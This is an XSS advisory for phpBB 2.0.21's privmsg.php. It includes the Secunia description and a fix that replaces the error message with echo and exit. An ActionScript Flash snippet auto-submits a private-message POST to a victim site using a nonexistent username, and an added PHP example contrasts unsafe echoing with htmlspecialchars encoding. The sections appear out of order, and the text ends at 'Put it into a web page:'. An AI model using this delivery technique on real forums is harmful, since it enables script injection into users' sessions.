Put some text here and send it to the admin (or a normal user).
The receiving user must be logged in.
Fix:
Open phpBB2/privmsg.php
Find:
    if (!($to_userdata = $db->sql_fetchrow($result)))
    {
        $error = TRUE;
        $error_msg = $lang['No_such_user'];
Replace with:
    if (!($to_userdata = $db->sql_fetchrow($result)))
    {
        $error = TRUE;
        echo "Sorry, but no such user exists.";
        exit;
phpBB (privmsg.php) XSS Exploit
By: Demential
Web: http://headburn.altervista.org
E-mail: info@burnhead.it
PhpBB website: http://phpbb.com
Exploit tested on phpBB 2.0.21
Secunia.com said:
Input passed to the form field "Message body" in privmsg.php
is not properly sanitised before it is returned to the user
when sending messages to a non-existent user.
This can be exploited to execute arbitrary HTML and script code
in a user's browser session in context of an affected site.
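The Secunia text above describes the root cause: the submitted message body is written back into the response without HTML encoding. The snippet below is an added illustration, not phpBB's code and not part of this advisory; the field names and the constructed sample input are assumptions. It places the unsafe "echo the value back" pattern beside the encoded version so the difference in the rendered output is visible.

```php
<?php
// Added illustration (not phpBB's code). Field names are assumed.

// Constructed sample input standing in for a submitted private-message form.
$submitted = [
    'username' => 'no_such_user',
    'subject'  => 'hello',
    'message'  => '<b>bold</b> & "quotes" <script>alert(1)</script>',
];

// Vulnerable pattern: the raw value is concatenated into the page, so any
// markup it contains is interpreted by the browser.
function render_error_unsafe(array $post): string
{
    return '<p>No such user.</p>'
         . '<textarea name="message">' . $post['message'] . '</textarea>';
}

// Encode for the HTML context: <, >, &, " and ' become entities, and
// ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string.
function html_escape(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hardened pattern: the same page, but every user-controlled value is encoded
// before it is re-displayed.
function render_error_safe(array $post): string
{
    return '<p>No such user.</p>'
         . '<textarea name="message">' . html_escape($post['message']) . '</textarea>';
}

// Simple check a reviewer can apply to any rendered fragment: does the
// user-supplied string survive as a raw tag in the output?
function contains_raw_tag(string $html, string $userInput): bool
{
    return strpos($html, $userInput) !== false;
}

echo "Unsafe: ", render_error_unsafe($submitted), PHP_EOL;
echo "Safe:   ", render_error_safe($submitted), PHP_EOL;
echo "Raw input present in unsafe output? ",
     var_export(contains_raw_tag(render_error_unsafe($submitted), $submitted['message']), true), PHP_EOL;
echo "Raw input present in safe output?   ",
     var_export(contains_raw_tag(render_error_safe($submitted), $submitted['message']), true), PHP_EOL;
```

Run with the PHP CLI (php example.php). The advisory's own fix takes a different route, printing a fixed error string and calling exit so the submitted text is never re-displayed; the encoding approach shown here keeps the form pre-filled for the user while making the echoed value inert.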
The Exploit:
Create a Shockwave Flash file with this code:
    var username:String = "user_that_doesnt_exist";
    var subject:String = "Xss Exploitation";
    var message:String = "";
    var folder:String = "inbox";
    var mode:String = "post";
    var post:String = "Submit";
    getURL("http://victim.com/phpBB2/privmsg.php", "_self", "POST");
Put it into a web page: